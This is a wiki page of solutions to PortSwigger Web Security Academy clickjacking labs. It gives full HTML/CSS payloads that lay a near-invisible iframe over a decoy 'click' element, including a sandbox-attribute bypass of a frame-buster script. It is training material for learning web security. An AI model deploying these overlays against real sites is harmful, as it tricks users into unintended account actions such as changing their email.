Skip to content

Clickjacking

Jump to bottom
Alnoman Kamil edited this page Nov 26, 2024 · 9 revisions

Apprentice lab:
Basic clickjacking with CSRF token protection

  • Solution

    1. Payload 
      <style>
    iframe {
        position:relative;
        width:1000px;
        height:700px;
        opacity:0.0001;
        z-index: 2;
    }
    div {
        position:absolute;
        top:515px;
        left:60px;
        z-index: 1;
    }
</style>
<div>click</div>
<iframe src="https://uuid.web-security-academy.net/my-account"></iframe>

Apprentice lab:
Clickjacking with form input data prefilled from a URL parameter

  • Solution

    1. Payload 
      <style>
    iframe {
        position:relative;
        width:700px;
        height:500px;
        opacity:0.0001;
        z-index: 2;
    }
    div {
        position:absolute;
        top:450px;
        left:80px;
        z-index: 1;
    }
</style>
<div>click</div>
<iframe src="https://0ad9003504def6cd828decd300f4001f.web-security-academy.net/[email protected]"></iframe>

Apprentice lab:
Clickjacking with a frame buster script

  • Solution

    1. Payload. 
      <style>
iframe {
    position:relative;
    width:700px;
    height:500px;
    opacity:0.0001;
    z-index: 2;
}
div {
    position:absolute;
    top:450px;
    left:80px;
    z-index: 1;
}
</style>
<div>click</div>
<iframe sandbox="allow-forms"
src="https://uuid.web-security-academy.net/[email protected]"></iframe>

Note

Always use Chromium for Clickjacking labs!

Solutions for the Portswigger's Web Security Academy using mitmproxy and other cli tools instead of Burp Suite

Home

Server-side topics:

Client-side topics:

Advanced topics:

Clone this wiki locally